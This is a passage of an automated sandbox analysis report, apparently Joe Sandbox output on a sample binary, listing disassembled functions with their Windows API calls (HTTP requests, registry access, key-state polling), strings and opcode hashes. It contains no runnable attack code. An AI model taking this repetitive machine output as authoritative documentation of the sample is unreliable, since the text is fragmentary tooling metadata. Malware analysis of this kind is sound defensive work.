                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BF7890,00000000), ref: 00B93012
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem_memset
                                              • String ID: 0
                                              • API String ID: 1173514356-4108050209
                                              • Opcode ID: 78416e1e1bcd2e7c20f195c949059c691bc431f6f7029b05f3ef4c32a267bd94
                                              • Instruction ID: bd52fb82f18503b4b264fe99f54d6914f2812a0f13c02d9bbf86daab7d2e07d5
                                              • Opcode Fuzzy Hash: 78416e1e1bcd2e7c20f195c949059c691bc431f6f7029b05f3ef4c32a267bd94
                                              • Instruction Fuzzy Hash: 1C41A331604341AFDB20DF24C884F5ABBE4EF89710F144AADF5A5972D1DB70EA05CB56
                                              Function 00BADE8E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BADEAE
                                                • Part of subcall function 00B41462: _memmove.LIBCMT ref: 00B414B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharLower_memmove
                                              • String ID: cdecl$none$stdcall$winapi
                                              • API String ID: 3425801089-567219261
                                              • Opcode ID: 2d85adb1041e20453bbc720c867bfa98a22d05614c3290a55d14436531398d45
                                              • Instruction ID: 50890791150c8c8a58455494d13caf373f4accc6b585ad769e002edaa4761adf
                                              • Opcode Fuzzy Hash: 2d85adb1041e20453bbc720c867bfa98a22d05614c3290a55d14436531398d45
                                              • Instruction Fuzzy Hash: 4431B271904219AFCF10EF58CD809EEB3F4FF05310B108AA9F826976D1DB32AA45CB80
                                              Function 00B89A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B8B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00B8B7BD
                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B89ACC
                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B89ADF
                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B89B0F
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$_memmove$ClassName
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 365058703-1403004172
                                              • Opcode ID: 3f58d0c8c04c82123f3d5497428224acf3451e9482678e473665b7742e276181
                                              • Instruction ID: de70fa81236d4fe888aad01eca25b83831a7e9181896231ea366a3e8b8131d9f
                                              • Opcode Fuzzy Hash: 3f58d0c8c04c82123f3d5497428224acf3451e9482678e473665b7742e276181
                                              • Instruction Fuzzy Hash: 9E21F071E00104AADF14BBA4DC86DFEB7E8DF55360F184699F821A72E1DB340D49E720
                                              Function 00BA1EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BA1F18
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA1F3E
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BA1F6E
                                              • InternetCloseHandle.WININET(00000000), ref: 00BA1FB5
                                                • Part of subcall function 00BA2B4F: GetLastError.KERNEL32(?,?,00BA1EE3,00000000,00000000,00000001), ref: 00BA2B64
                                                • Part of subcall function 00BA2B4F: SetEvent.KERNEL32(?,?,00BA1EE3,00000000,00000000,00000001), ref: 00BA2B79
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                              • String ID:
                                              • API String ID: 3113390036-3916222277
                                              • Opcode ID: 7e3c7e3044a8a7abd792ace3b340132028a59cce08d265775319e8adf0926af2
                                              • Instruction ID: c02123ed93c9b0ba69e977d1f82f84d5464a09ff6b9116befa5d064bcb90b422
                                              • Opcode Fuzzy Hash: 7e3c7e3044a8a7abd792ace3b340132028a59cce08d265775319e8adf0926af2
                                              • Instruction Fuzzy Hash: 4C2101B1608208BFEB51AF28CCC5EBF77EDEB4AB84F00055AF405A7200DB259D049BB0
                                              Function 00BB6A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B32111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B3214F
                                                • Part of subcall function 00B32111: GetStockObject.GDI32(00000011), ref: 00B32163
                                                • Part of subcall function 00B32111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B3216D
                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BB6A86
                                              • LoadLibraryW.KERNEL32(?), ref: 00BB6A8D
                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BB6AA2
                                              • DestroyWindow.USER32(?), ref: 00BB6AAA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                              • String ID: SysAnimate32
                                              • API String ID: 4146253029-1011021900
                                              • Opcode ID: 3f37351d8ddcf4bdc6864638f5dadd26cb1a8d8e7fabb9399dc82df38885e2f2
                                              • Instruction ID: 5373694a7cbed2f8558df35214fa9f0be717a47b556b739c6d0ab93e4d9a2119
                                              • Opcode Fuzzy Hash: 3f37351d8ddcf4bdc6864638f5dadd26cb1a8d8e7fabb9399dc82df38885e2f2
                                              • Instruction Fuzzy Hash: 76218871200205AFEF109FA4DC80EFB77EDEB59324F148668FA50A3190D7B99C519760
                                              Function 00B97357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00B97377
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B973AA
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00B973BC
                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B973F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: b0bb058bf72e0ae97998a1534107627e92b049cc15f2028c39889df91ad60b5a
                                              • Instruction ID: 01bbcd1007d154becf5fa529b17c649e21b55b99d2d699d9e8aad8d1328ec6e7
                                              • Opcode Fuzzy Hash: b0bb058bf72e0ae97998a1534107627e92b049cc15f2028c39889df91ad60b5a
                                              • Instruction Fuzzy Hash: 8A219C70558206ABDF209F69DC44E9A7BE4EF45720F204AA9FCA0D72E0DB709851DB64
                                              Function 00B97425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00B97444
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B97476
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00B97487
                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B974C1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: 29b2f3eba349335cdd647a7cca32d5db9829f0a771847f721d68960937905555
                                              • Instruction ID: 3a4b7e264ac75670903c1bf410f80ec5267d9f1cd68c2601c7b37eb2c1204688
                                              • Opcode Fuzzy Hash: 29b2f3eba349335cdd647a7cca32d5db9829f0a771847f721d68960937905555
                                              • Instruction Fuzzy Hash: 1A2192316582069BDF209F699C44E9A7BE8EF55720F200AA9F9A0E73D1DF709850C751
                                              Function 00B9B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00B9B297
                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B9B2EB
                                              • __swprintf.LIBCMT ref: 00B9B304
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,00BC0980), ref: 00B9B342
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorMode$InformationVolume__swprintf
                                              • String ID: %lu
                                              • API String ID: 3164766367-685833217
                                              • Opcode ID: 96d2ba87de9982f41c44863805724df271525fa5747b4e328bc4acc35dfb8d88
                                              • Instruction ID: 57ea97bfdfac75f908aaa576452e2bd55f4cdbff94bcf59621718f5a131dfd54
                                              • Opcode Fuzzy Hash: 96d2ba87de9982f41c44863805724df271525fa5747b4e328bc4acc35dfb8d88
                                              • Instruction Fuzzy Hash: FA216231A00108AFCB10EF65C885DAEB7F8EF49704F1440A9F905DB352DB31EA45CB61
                                              Function 00B8AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                                • Part of subcall function 00B8AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B8AA6F
                                                • Part of subcall function 00B8AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8AA82
                                                • Part of subcall function 00B8AA52: GetCurrentThreadId.KERNEL32 ref: 00B8AA89
                                                • Part of subcall function 00B8AA52: AttachThreadInput.USER32(00000000), ref: 00B8AA90
                                              • GetFocus.USER32 ref: 00B8AC2A
                                                • Part of subcall function 00B8AA9B: GetParent.USER32(?), ref: 00B8AAA9
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00B8AC73
                                              • EnumChildWindows.USER32(?,00B8ACEB), ref: 00B8AC9B
                                              • __swprintf.LIBCMT ref: 00B8ACB5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                              • String ID: %s%d
                                              • API String ID: 1941087503-1110647743
                                              • Opcode ID: 6f22d9ca4fdd83049ad0f6f65ab359550c1ae614fd4d93705e3bc7067b230ba3
                                              • Instruction ID: a80fb03a37320a689212bd8fa92fb9dddeab08ce9bdc9747ce6ec2e8b22175ec
                                              • Opcode Fuzzy Hash: 6f22d9ca4fdd83049ad0f6f65ab359550c1ae614fd4d93705e3bc7067b230ba3
                                              • Instruction Fuzzy Hash: E9119075600205ABEF11BFA4CD85FAA37ECEB48710F0440F6BE08AA162DB705955DB72
                                              Function 00B922E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00B92318
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                              • API String ID: 3964851224-769500911
                                              • Opcode ID: ee5ba7ff49ead61d11d4dc2e8fa94caf6e1d726dfa8ef2af61fe1522501907d6
                                              • Instruction ID: 9cdad57688e28f2dbf4176d5ce40af1c5b03b7f621cffc8eab4fdca782ae1a7d
                                              • Opcode Fuzzy Hash: ee5ba7ff49ead61d11d4dc2e8fa94caf6e1d726dfa8ef2af61fe1522501907d6
                                              • Instruction Fuzzy Hash: 1D113C31D201199FCF00EF94DA519EEB7F4FF16344B1084E9D81467292EB365E0ACB50
                                              Function 00BAF23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BAF2F0
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BAF320
                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00BAF453
                                              • CloseHandle.KERNEL32(?), ref: 00BAF4D4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                              • String ID:
                                              • API String ID: 2364364464-0
                                              • Opcode ID: f9987f18520d93314555c5b0d4040f51919bb3a05f75fe07d0a1732601e23f20
                                              • Instruction ID: 045ce5a3bbb9f1eae02a1b20d5d3a119035f610d0670980b001bd6162803c407
                                              • Opcode Fuzzy Hash: f9987f18520d93314555c5b0d4040f51919bb3a05f75fe07d0a1732601e23f20
                                              • Instruction Fuzzy Hash: 558192716143019FD720EF64D886F6BB7E5AF48710F1489ADF999DB392DBB0AC008B91
                                              Function 00BB0697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00BB147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BB040D,?,?), ref: 00BB1491
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BB075D
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BB079C
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BB07E3
                                              • RegCloseKey.ADVAPI32(?,?), ref: 00BB080F
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BB081C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3440857362-0
                                              • Opcode ID: 9a9732b9812bd00898fb7ddbdf173ff0739b95468478734b34af502e6da53cfb
                                              • Instruction ID: d8c705b153d1ad56d1aceac64ed812613c0be4a2e109a586018cd496d112e8b5
                                              • Opcode Fuzzy Hash: 9a9732b9812bd00898fb7ddbdf173ff0739b95468478734b34af502e6da53cfb
                                              • Instruction Fuzzy Hash: DA514971618204AFC704EF68CC91EBBB7E9EF88304F14899DF596872A1DB70E944DB52
                                              Function 00B9EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B9EC62
                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B9EC8B
                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B9ECCA
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B9ECEF
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B9ECF7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                              • String ID:
                                              • API String ID: 1389676194-0
                                              • Opcode ID: f8b5869c474afeaafc634dc6f81a00961c5bd219020872f1371078c4425c78d6
                                              • Instruction ID: 7c8291f20a6264b4d1440d32f28a140c777fb5ff837f27d244f5ee21e50cc54e
                                              • Opcode Fuzzy Hash: f8b5869c474afeaafc634dc6f81a00961c5bd219020872f1371078c4425c78d6
                                              • Instruction Fuzzy Hash: F3510735A00109DFCB01EF64C985AAEBBF5EF09314B1884E9E859AB361CB31ED51DB50
                                              Function 00BBA67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c5d85ffa02137630237a4d222e2a8244e69ab4e993c9b1cfebdbef3a08ba65dd
                                              • Instruction ID: 6e02a016b4a9dfc1a6bc674788632c0a1fda5bd3da4c4ac81aada0cc11eefff4
                                              • Opcode Fuzzy Hash: c5d85ffa02137630237a4d222e2a8244e69ab4e993c9b1cfebdbef3a08ba65dd
                                              • Instruction Fuzzy Hash: E941AF75D08214AFD7209B29CC88FF9BBF8EB0A350F1401E5E916A72D1CEB0AD41DA51
                                              Function 00B32714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00B32727
                                              • ScreenToClient.USER32(00BF77B0,?), ref: 00B32744
                                              • GetAsyncKeyState.USER32(00000001), ref: 00B32769
                                              • GetAsyncKeyState.USER32(00000002), ref: 00B32777
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AsyncState$ClientCursorScreen
                                              • String ID:
                                              • API String ID: 4210589936-0
                                              • Opcode ID: bc62aa8538f0079eb102f3b73a5efd441f68961ce33106e0673de924b68e9ef0
                                              • Instruction ID: 4e15194b38cd8b79ca2eb23cafe95da51ac137e04e6a3d068b92be5635b495e5
                                              • Opcode Fuzzy Hash: bc62aa8538f0079eb102f3b73a5efd441f68961ce33106e0673de924b68e9ef0
                                              • Instruction Fuzzy Hash: 84416D35504119FFDF159F69C884EF9BBB4FB09324F2083AAF86896290CB34AD50DB91
                                              Function 00B895D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00B895E8
                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00B89692
                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B8969A
                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00B896A8
                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B896B0
                                              Memory Dump Source
